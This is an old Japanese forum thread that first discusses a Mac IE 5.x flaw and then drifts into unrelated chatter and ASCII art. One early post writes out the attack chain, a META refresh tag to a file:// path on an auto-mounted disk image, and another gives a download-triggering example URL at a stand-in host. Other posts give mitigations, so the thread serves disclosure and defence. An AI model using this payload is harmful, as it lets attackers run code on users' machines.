Mac IE 5.x 史上最悪のセキュリティホール発見
>>1 ウチのMacのドライブ名はウンコってリネームしてるから大丈夫
ウンコてここでは一番狙われる名前じゃねーかよ!!!
4 :
●~* タイプ1 の厨房が発生しました :02/01/28 23:35
だからドライブ名は関係なくできるんだってば…。
>>4 ちょっとおめえ、啓蒙のため、実地訓練してきなさい。
7 :
●~* タイプ1 の厨房が発生しました:02/01/28 23:54
じゃあ説明するよチクショー…
ディスクイメージを圧縮したファイルをダウンロードすると、
初期設定のままでは StuffIt Expander で解凍と、
『マウントまでもが自動的に行われる』(←これ重要!)
マウントされるディスク名が例えば "Unko" だとする。これは変えられない。
そのディスクの中に "omaemona.app" という悪意のプログラムがあるとする。
それは、『file:///Unko/omaemona.app』とフルパスで呼び出せる。
圧縮ファイルをダウンロードさせるページを開かせる
(自動的にダウンロードさせるとベター)
↓
<META HTTP-EQUIV="Refresh" CONTENT="10;URL=file:///UnkoHD/omaemona.app">
↓
プログラム起動、実行
↓
(゚д゚)ウマー
8 :
●~* タイプ1 の厨房が発生しました:02/01/29 00:09
でも本当にBasiliskIIと漢字Talk 7.5.5の組み合わせでも、
AppleScriptであんなことやこんなことができてしまうので、
マカ絶滅をもくろむスキル無し厨房でも設置可能。
絶対禁止!!
10 :
●~* タイプ1 の厨房が発生しました:02/01/29 00:24
>>9 俺は真実を書いてるだけですよ。
一度世間に明らかになった以上、悪用される可能性は格段に高くなる。
被害がおこらないうちに、できる限り広めなきゃ。
そのために限られた資源を使ってスレッドをひとつ立てさせていただいた。
煽っているというなら、それは各自が対策をするよう、煽ってる。
それではみなさん、対策を施して、良いマカライフを!
>>10 ありがとう。
それを聞いた俺はネスケを使い続けることにした。
きっつい問題やな。
MSのせいで、「マクは脆弱です」とか言われてしまうわけかw
皮肉だ。
この機会にMozillaをお勧めする。
13 :
●~* タイプ1 の厨房が発生しました:02/01/29 00:43
IEが Mac OS と結びついている以上に、
IEが StuffIt Expander と結びついていることが、問題かも。
ちなみに iCab でも同じことが起こります。
そう考えると、Mozilla って結構セキュリティ気使ってんのね。
>1
乙彼、サンクス。
今日apple留無にも載ってたよ。
これ簡単すぎてスクリプターでも気づかないわ。
>>14 > これ簡単すぎてスクリプターでも気づかないわ。
本当は、すべての「危なそうな」ケースを全通り試せる、
ユニットテスト用のプログラムがあるといいんだよね。
ボタン一つでセキュリティホールを診断。
自動化Mac最高(それはもういいって
jsUnitはあったと思うから、それ使えばHTMLも試せるかと。
OSXのIEは大丈夫なのか。
つーことは、とっととOSXに移行しろってことで放置されたりして。
満を持してOSX+ネスケ
そもそもブラウザが他のアプリを勝手に起動したりすること自体間違いだと思う。
UNIX文化なんだろうね、そういうのは。
Macの文化ではユーザーの指示していないことを勝手にすることはタブーだと思うんだが。
プッ
今のところまだ2ちゃんでは見かけないが…。
ブラウザのデフォルトの設定が「自動的にMacBinaryファイルをデコードする」
になってるから悪いのか?
23 :
vm_converter:02/01/30 16:28
ネタニマジレスカコワルイ系だけど....。
>>22 ウソ言っちゃダメ。
今回のはアソコ設定(MacBinaryとBinhex)は関係ない。
関係有ったのは、Mac OS XのIEが5.1.2だった頃の話。
今の時点で解ってる事を書いておくから参考にして。
・元々の脆弱性に対する対処=ファイルパスを知られない様に
→ボリューム名を変更する
→IEでダウンロード先をデフォルトから変更しておく
・勝手に何かをダウンロードさせられない様に
→セキュリティゾーン設定で“高”にするか“カスタム”にして
ファイルのダウンロードを無効にする
・ダウンロードさせられた後に自動解凍しない様に
→ファイルヘルパーの設定でStuffit Expanderに関する項目を
[アプリケーションで後から処理する] から [ファイルに保存する]
に変更する
・ディスクイメージを使った手法をとられても大丈夫な様に
→Stuffit Expanderの設定で [ディスクイメージをマウント]の
チェックを外しておく
以上をやっても、
・ファイルパスを知られてしまったら、ファイルの実行は
可能のまま(IEは。iCabなら対処法有り。)
・今の所、Stuffit Expanderで解凍できる形式の事しか
検証してないけど、他の方法をとられたらヤバイかも
って事です。書き残しがあったらスマソ
一言で言えば、IEは使うなってこった。
>>23 報告はカコイイと思われ。
報告内容は深刻すぎて、MacIEカコワルイ! って感じだけど。
METAタグなんか、設定で無効に出来ないじゃんねぇ。
つーか、
・MacIEを使わない
で解決可能なような。
これもっと広く知られていてもいいことなのに…。
ほとんどのメディアで問題視されてないんだな。
な〜に、Mac自体が社会から放逐されているからだよ。
つまり腐ったりんごはすててしまえということよ。
>>23 今10.1に付いてくるIEはver.5.1.3。
でも、見る限りMSのHPにはcarbon版自体が置いてないようなんだな。調査不足かな?
よって
>>23の言うようなこともサイトにめっかんないんだけど。鬱
32 :
vm_converter:02/01/31 19:06
>>31 >今10.1に付いてくるIEはver.5.1.3。
ん?それは今売ってるハードに付属のMac OS XにはIE 5.1.3が入ってるってこと?
それだとしたら、知らなかった。現行商品興味無いので。
でも今10.1.2使ってる人の大半って10.1を買ったりUp-to-Dateしたり並んだり
して手に入れて、アップデートしてきた人じゃない?
で、MSのサイトにMac OS X版の5.1.3は無いね。漏れも調べたけど。
情報が見付からないのはねぇ...。そもそも一番最初のBugtraqへの投稿
ttp://archives.neohapsis.com/archives/bugtraq/2002-01/0276.html にも↓って書いてあるから...。
「I contacted Microsoft 2 months ago, they did not reply. 」
MS本家が2ヶ月も放置してるんだから日本のMSサイトには載らない
だろうなぁ。しばらくは。
大体こないだのOEのバッファオーバーフローの件だってどっちのMSにも
情報出てないよ(萎)
33 :
vm_converter:02/01/31 19:17
それと。Bugtraqの投稿にある、URL=file:///〜 でローカルにある
既知のパスのファイルが実行できちゃうってのは、Bugtraqに
投稿された位だから世界中に広まってるだろうけど、
URL=
http://hugahuga.com/huga.sit とかでダウンロードが始まっちゃう件と
ディスクイメージ使って任意のファイルパスを作り出しちゃう件は
恐らく日本人のしかもほとんどがMacユーザーしか知らないという、
とても日本ローカルの話なのよ。
>>28 その内なんとかなるでしょ。きっと。
あ。やべ。URL=のトコ、リンクになっちゃった。スマソ
押しちゃダメね。hugahuga.comって無いから良いけど。
# でもhoge.comのhoge.exeってのは有るんだよな(w
35 :
vm_converter:02/02/01 02:46
何か立て続けに書いてて、その上宣伝みたいで悪いんだけど。
新しい情報が出てきたよ。
>>1にあるURLそれぞれに上がってる。
で、ゴメン。ageてしまう。
もうIEだけの問題じゃなくなってるんだけど。
とりあえず、色んな意味でデフォルトはヤバイって事で。
めんどくさいな...
37 :
vm_converter:02/02/01 03:44
>>36 スマソなぁ。読みにくくて。
まとめてる余裕無いんだよ。ホント。
とりあえず、
>>22にプラスして、
・Stuffit Expanderで“解凍を継続する”をオフ
・QuickTime設定のコンパネで“CD-ROMを自動的に再生する”をオフ
しといて。
他のブラウザについてもこの2つと
・Stuffit Expanderの設定で [ディスクイメージをマウント]の
チェックを外しておく
のはやっておいた方が良い。
後はもう個別のブラウザの設定が多すぎて、手が回ってない。
ってゆーか、これから今日昼納期の仕事するんだ。許してくれ。
実害が出れば、真剣に対応すると思うぞ。
いやマジに
1のリンクはクリックしちゃだめ!
フォーマットされちゃうよ!!
新板見てきたけど、Mozillaは助かるのね。
それ以外は全滅だとか。やっぱりここは乗り換えるべきでしょう(煽
いやー、やっぱ鳥ちゃんこだねぇ
>>730 そうだよねー。
私の青春はWRとともにあったから、WRには大変楽しませてもらった。
70年代の音楽って多種多様で、すごく元気だったって思うな。
私は、ブラックマーケットで初めてWRを知った。
Heavy Weather→すげっ、いいなあBirdLand。完璧じゃんかよ。
Mr Gone→うーん、シンセの塊だな、難解だ。
8:00→うわー、Black Marketいいねえ。In A Silent Way鳥肌。
D面もイイ!
Night Passage→明るく楽しいWRだ。ジャコ凄いなあ。
WR 81'→NYC最高。ピーター上手くなったなあ。
Procession→参った。全曲クオリティ高いじゃん。興奮した。
Domino Thory→うーん。悪くはないけど....Can It Be Doneはいい。
Spotin Life→時代的にしょうがないのかなあ。
This Is This→時代が終わったのねー、WRおつかれー
初めて聴いた印象ってこんな感じでした。
誤爆スマソ、何やってんだ漏れ。
バッファロードーター
OSXの話だったのか。
ClassicOSの話だとおもてたよ。。 。
たまには地下を見回り。現在507F
異常なし。
お勤めごくろうさまです。
窓あけっぱにしてたら、
カメムシがイパーイ遊びにいらっしゃって鬱。
つぶさないように。
sawaranaiyouni
tabetemiro!
>>49 はっ!ありがとうございます。敬礼
>>50 北海道の冬にログハウスに泊まったとき、カメがたくさん越冬していたよ
100匹はいたと思う。ひっくり返っていたので、死んでいるのかなと
思っていた。ストーブつけたら、むくっ、むくっと足が動き、暫く
したら、歩き出した。ストーブがんがん燃やしていたら、今度はカメ
飛び回ってるんだよ。何10匹も。
お陰で、何匹も踏みつぶしてしまったよ。
カメの不思議。
君たち!!
えーっと、
今日日、最下位スレッドなんて流行んねーーんだよ!プンプン
今も昔も、通は「長寿スレッド」コレだね。
まぁ、センスのない野郎共に晒されるまで、わずかな一時を楽しんでなさいってこって。
06/10,6:49PM現在
深度509
…
ドキドキ
ワーイ!
コリンタンだ!!
昨日はぬりがと〜
私の場合、
長寿スレッドは偶然見つけるしかないんだけど、
最下位なら迷わずこれるのがいいところです。
20時29分現在
509階!
22ジ58プン現在
510階!
ワンランクダウソ!!
PhotoshopのX版重いね。
マウスカーソルがカクカクで精神衛生上いくない。
疲れました、寝よう。
鮒ちゃん,何使ってるんだっけ?
プロマウスはスムースダヨ
聞かれてないけどw
私は丸マウス。
午後8時30分現在
511階!
さらにワンランクダウソ
あと梅雨入りしますた。
最下位点検です。
お邪魔しました。
|
|//
| .\ コソーリ
|─ /
|⊂|
| |
| Ц
|从*)) / どかーん!
|⌒ ζ * /
|: ∂ )) /
| lll ;从 *(・)/
| ‡ * ζ ∵―
|; : ) ¢) )―
|( )) *ヽ\ ヽ・
| )) ( ζ\*
|
|
| ......
|
|
|
| 。 ゛* ..
~ Ж ,, σ ・
|
|
|ヽ ヂュル
|ノ
|
|
| 。 ゛* ..
~ Ж ,, σ ・
|
|∫
| \ ヂュルヂュル
| /
|)
|)
|l 。 ゛* ..
~ Ж ,, σ ・
|
|∬
| .\ ムムム
|~/
| b 〃
| |
|ノ 。 ゛* ..
~ Ж ,, σ ・
|
|//
| .\ フカーツ!
|─ /
|⊂|
| |
| Ц 。 ゛* ..
~ Ж ,, σ ・
Cubeの450MHzなり。
線引いてると、カーソルが飛びやがんの。
OSが重いのか?アプリが重いのか?・・マシィーンの力不足か。。。
マウスはエレコムの光学マウス使こてるよ。
手が小さいんで、プロマウスやインテリマウスだと掴みにくい。
OS Xだと光学マウスの方が、カーソルがスムーズに動くよね。なんでやろ?
22時13分現在
513階!
>>65-71 とりあえずフカーツおめでとう。
下にカスがあるということは実はフカーツではない?
>>72 わかりませぬ。お役に立てずスマソ。
後学のためOSXには光学マウスと覚えておきます。
光学マウスは高額マウスですかw
>>72 OS Xで飛ぶのかな?
アプリは何?
漏れはCube改にケンジントンの「TurboBall」だけどこっちもいいよ。
エレコムのちっさいマウス使ってます。
使い始めはちっさいなあと思ってましたが
今でもちっさいなあと思ってます。
でも慣れました。
>>75 あー、ホトショップなら飛ぶかも。
ベクトル系ならそうでもないと思うんだけど、ビットマップだとなんだかまだOS Xとうまく
いかないみたい。
鮗タン代返ありがとう。
Web用のちっこい画像でも飛んじゃうんで、結構いらつきます。
Quartzが原因なんかな? ジャガータンでマシになってくれたらいいんだけど。
あと、CubeのCPUカード発表されたんで、それも期待してます。
でも、高そうだよな。ファンも付いてるんだろうな。
>>78 実は普通のG4用のDual500CPUカードって、Cubeにも使えたんだよね。
メーカー側は保証してないけど。
あと、熱対策は必要だけど。
>>78 いえいえ、どういたまして。
たまには朝に書いてみます。
7時4分現在。
514階でし!
pm7ジ50フン
515諧なりよ!
10時44分現在
515階!
10時20分頃から雷が鳴り始めて雨も降り出した。
今さっきすごいのが落ちてビクーリ。
久々の地下クロール完了♪
今日の収穫。
24 名前:●~*(高性能) 投稿日:02/02/14 16:35
>>19 ┓(@v@)\
ぼくの Joystick を使ってくれ.
たまに,液体を吐き出すのが欠点だが...
海底探査に参りました。
深度515m 異常なし。
516階!!
パチンコ4万勝ったよ〜
鮒タンおめでと〜
516階!!
で、何に使いますか?
ピンサロに汁!
肉食ってきたよ、肉。
松坂牛ですか?
517階!
鮒が肉喰っとる・・・・・
鮫にしる!
/ヽ /ヽ
/ ヽ / ヽ
______ /U ヽ___/ ヽ
| ____ / U :::::::::::U:\
| | // ___ \ ::::::::::::::|
| | | | | U :::::::::::::|
| | アゲアラシダメポ .|U | | ::::::U::::|
| | | ├―-┤ U.....:::::::::::::::::::/
| |____ ヽ .....:::::::::::::::::::::::<
└___/ ̄ ̄ :::::::::::::::::::::::::|
|\ | :::::::::::::::::::::::|
\ \ \___ ::::::::::::::::::::::::|
/ヽ /ヽ
/ ヽ / ヽ
________/U ヽ___/ ヽ
| _____ / U ::::::::::U:\
| | // __ \ :::::::::::::|
| | | | | U::::::::::::|
| | |U | | ::::U:::|
| | | ├――-┤ U.....:::::::::::::::::/
| |_____ ヽ .....::::::::::::::::::::<
└____/ ̄ ̄ :::::::::::::::::::::::::|
|\ | ::::::::::::::::::::::::|
\ \ \____ ::::::::::::::::::::::::|
/ヽ /ヽ
/ ヽ / ヽ
________/U ヽ___/ ヽ
| _____ / U ::::::::::U:\
| | // __ \ :::::::::::::|
| | | | | U::::::::::::| ハァハァ
| | |U | | ::::U::::|
| | | ├――-┤ U...:::::::::::::::::/
| |_____ ヽ .....::::::::::::::::::::<
└____/ ̄ ̄ ::::::::::::::::::::::::|
|\ | ::::::::::::::::::::::::|
\ \ \____ ::::::::::::::::::::::::|
/ヽ /ヽ
/ ヽ / ヽ ここにも梨が・・・
________/U ヽ___/ ヽ
| _____ / U ::::::::::U:\
| | // __ \ :::::::::::::|
| | | | | U::::::::::::|
| |名前:梨 |U | | ::::U::::|
| | | ├――-┤ U...:::::::::::::::::/
| |_____ ヽ .....::::::::::::::::::::<
└____/ ̄ ̄ ::::::::::::::::::::::::|
|\ | ::::::::::::::::::::::::|
\ \ \____ ::::::::::::::::::::::::|
ちょっと休憩。
地下518階ですか・・・
宇宙戦艦ヤマトの最初の頃を思い出しますた。
では、仕事に戻ります。
ようし
>>97 水面に浮上したら、そのまま主砲を撃て、いいか!
最下層を満喫するぜ!
海底探査完了
ついでに100ゲット!
>98 館長、その時は波動砲ではいかがでしょうか?
>100 隊長殿、100ゲトおめでとうございます。
>>101 古代、デザリアム星は波動エネルギーに弱い。
波動砲を使ったら、サーシャもろともこの星は吹き飛んでしまう。
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::.:.:.::::::.:.:.:.:.:.:.:.:.:.:.:.:.:.::.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.::.:.::.:.:.:.:.:.:.
:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:..:...:...:...:..:..:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...
. .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . .
/ ̄ ̄\
/ ヽ
____________|_____|____________
-−_─ - ─_−_─ - ─ - ─_−_─ - _−-
-  ̄─_─ ̄─ -−-- = ─− ̄-
─ ̄ -−-- ─−--− ̄−-
-  ̄─_─ ̄─ -−-- = ─− ̄-
─ ̄ -−-- ─−--− ̄−-
....:.:....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.::.:....:.:...:.:.:.:.:.::.:.....
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::...............
:::::::::::::::::::::::::::::::∧∧:::::ナンシーさぁーーーーーーーーーーーーーーんっ!
:::::::::::::::::::::::::::::/⌒ヽ)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::......
~~~~~~~~~~~~~l::: U~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
〜l: |
U U
::o::::::::
:::::o::::::
o :::::::::
:::::o:::
o
o
o